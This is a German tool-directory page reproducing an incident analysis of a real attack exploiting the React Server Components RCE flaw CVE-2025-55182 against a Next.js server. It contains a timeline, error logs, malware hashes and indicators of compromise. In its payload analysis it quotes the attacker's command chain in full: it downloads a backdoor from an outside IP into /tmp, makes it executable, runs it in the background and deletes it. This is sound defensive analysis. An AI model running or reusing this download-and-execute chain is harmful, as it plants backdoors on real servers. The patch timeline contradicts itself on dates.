Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Management von Indicators of Compromise (IOC)SchwachstellenanalyseForensikWebsicherheitMalware-AnalyseBedrohungsanalyseLernen & BildungIncident Response

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Analyse von Angriffen aus der Praxis von CVE-2025-55182 (React2Shell) - React Server Components RCE-Sicherheitslücke

Repository anzeigen
16vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2025-55182 Angriffsanalyse: RCE in React Server Components

Reale Angriffsanalyse auf eine produktionseinsatzfähige Next.js-Anwendung

📋 Inhaltsverzeichnis

  • Zusammenfassung
  • Schwachstellenübersicht
  • Angriffszeitstrahl
  • Technische Analyse
  • Malware-Analyse
  • Indikatoren für eine Kompromittierung (IOCs)
  • Abhilfe und Reaktion
  • Erkenntnisse
  • Referenzen

Zusammenfassung

Am 5. Dezember 2025 wurde unsere produktionseinsatzfähige Next.js-Anwendung von Angreifern angegriffen, die CVE-2025-55182 (React2Shell) ausnutzten – eine kritische Remote-Codeausführungsschwachstelle in React Server Components. Der Angriff versuchte, einen Linux-Backdoor-Trojaner auf unserem Server herunterzuladen und auszuführen.

AttributWert
CVE-IDCVE-2025-55182
CVSS-Score9.8 (Kritisch)
Angriffsdatum5. Dezember 2025
Angriffsergebnis✅ Blockiert (nach Patch)
Malware-TypLinux-Backdoor-Trojaner
Betroffener StackNext.js + React Server Components

Schwachstellenübersicht

Was ist CVE-2025-55182?

CVE-2025-55182, auch bekannt als „React2Shell“, ist eine kritische Remote-Codeausführungsschwachstelle (RCE), die React Server Components (RSC) in folgenden Umgebungen betrifft:

  • React: Versionen 19.0.0 - 19.2.1
  • Next.js: Versionen 15.x und 16.x (vor den Patches)

Ursache

Die Schwachstelle liegt in der Funktion renderToReadableStream() im React Flight Server. Bei der Verarbeitung speziell gestalteter RSC-Payloads wird die Eingabe nicht ordnungsgemäß bereinigt, was zur Ausführung beliebigen Codes führt.

Angriffsvektor

Angreifer → Böswilliges RSC-Payload → Flight Server → eval() → RCE

Der Angreifer sendet eine präparierte POST-Anfrage mit einem bösartigen serialisierten Payload, das deserialisiert und auf dem Server ausgeführt wird.


Angriffszeitstrahl

Phase 1: Erste Ausnutzungsversuche (vor Patch)

Zeitstempel (UTC)Ereignis
Dez 5, 06:20Erster Angriff via Sentry erkannt
Dez 5, 06:20Payload versucht, Shell-Befehle auszuführen
Dez 5, 06:20Angriff teilweise erfolgreich (vor Patch)

Sentry-Fehlerprotokoll (vor Patch):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Phase 2: Patch-Bereitstellung

ZeitstempelAktion
Dez 4, 14:13Upgrade auf Next.js 16.0.7
Dez 4, 14:13Gepatchte Version bereitgestellt (v1.0.0-beta-4)

Phase 3: Angriff nach Patch blockiert

Zeitstempel (UTC)Ereignis
Dez 5, 08:48Angriffsversuch erkannt
Dez 5, 08:48Payload-Ausführung BLOCKIERT
Dez 5, 08:48Fehler: syntax error: unexpected ";"

Sentry-Fehlerprotokoll (nach Patch):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

Der Patch hat die Ausführung des bösartigen Befehls erfolgreich verhindert.


Technische Analyse

Details zur Angriffsanfrage

AttributWert
Ziel-URLhttps://[REDACTED]/
MethodePOST
User-AgentPython Requests 2.31
UrsprungAutomatisiertes Angriffsskript

Payload-Analyse

Der Angreifer versuchte, die folgende Befehlskette auszuführen:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Aufschlüsselung:

SchrittBefehlZweck
1wget http://45.76.155.14/vim -O /tmp/vimMalware herunterladen
2chmod +x /tmp/vimAusführbar machen
3nohup /tmp/vim > /dev/null 2>&1 &Im Hintergrund ausführen, nach Abmeldung weiterlaufen
4rm -f /tmp/vimBeweise löschen

Serverumgebung

KomponenteVersion
BetriebssystemAlpine Linux 3.23.0
LaufzeitNode.js v20.19.6
FrameworkNext.js 16.0.7 (gepatcht)
ContainerDocker

Malware-Analyse

Dateiinformationen

AttributWert
Dateinamevim (als legitimes Tool getarnt)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
DateitypELF 64-bit LSB executable, x86-64
SpracheGo (kompilierte Binärdatei)
Dateigröße~4,7 MB

VirusTotal-Ergebnisse

Erkennungsrate: 13/72 (18%)

AnbieterErkennungsname
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

VirusTotal-Link: Analyse anzeigen

Binäranalyse

ELF-Header:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Identifizierte Fähigkeiten:

FähigkeitNachweis
HTTP/HTTPS-Clientnet/http, *http.Client
TLS-Verschlüsselungcrypto/tls, crypto/aes
SOCKS5-Proxysocks, socks5
DNS-Auflösungnet/dns/dnsmessage
Starke Kryptographiechacha20poly1305, Ed25519

Extrahierte Zeichenketten (relevant):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Ausgelöste IDS-Regeln

SchweregradRegelQuelle
NIEDRIGET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
NIEDRIGET DNS Query for .cc TLDProofpoint ET Open

Malware-Klassifizierung

Typ: Linux-Backdoor-Trojaner

Fähigkeiten:

  • Remote-Shell-Zugriff
  • Command & Control (C2)-Kommunikation
  • Datei-Upload/-Download
  • Verschlüsselte Kommunikation
  • Verkehrstunneling über SOCKS5
  • Persistenzmechanismen

Indikatoren für eine Kompromittierung (IOCs)

Netzwerk-IOCs

TypWertBeschreibung
IP-Adresse45.76.155.14Malware-Verteilungsserver
URLhttp://45.76.155.14/vimMalware-Download-URL
HostingVultr VPSCloud-Anbieter
TLD.ccC2-Domain verwendet .cc TLD

Datei-IOCs

TypWert
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Bei Bedarf berechnen]
MD5[Bei Bedarf berechnen]
Dateinamevim (getarnt)
DateitypELF 64-bit x86-64
Dateigröße~4,7 MB

Verhaltens-IOCs

IndikatorBeschreibung
wget auf externe IPDownloads von nicht standardmäßigen URLs
Dateien in /tmp/Verdächtige ausführbare Datei im temporären Verzeichnis
nohup + HintergrundausführungPersistenzversuch
Sofortige DateilöschungBeweisbereinigung
Python Requests User-AgentAutomatisiertes Angriffswerkzeug

YARA-Regel

Tool herunterladen